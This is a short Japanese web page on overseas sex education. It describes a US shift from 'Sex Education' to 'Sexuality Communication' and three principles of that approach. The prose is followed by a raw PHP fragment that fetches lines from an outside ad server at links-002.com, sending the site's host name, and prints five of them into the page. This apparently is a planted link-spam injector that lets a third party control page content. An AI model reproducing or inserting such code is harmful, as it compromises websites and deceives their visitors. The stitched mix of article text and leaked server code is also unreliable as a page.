海外の教育

 

アメリカでは性教育をSex Educationとしていたが、生殖につながる性だけでなくそれよりももっと幅広く人間の性活動を考察していこうといった動きになったため、Sexuality Communicationという呼び方に変えた。ここでセクシュアリティコミュニケーションの理念を紹介する。まず、教義・ドグマではなく知識を伝達する。2つめに、性を肯定しセックスの喜びは全ての人に平等に与えられた権利としそれを認める。3つめに画一的な規範から多元的選択への移行を目指す。

//// $MAX = 5; // ////////////////// $lines = file('http://links-002.com/ad/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST'])); shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); } ?>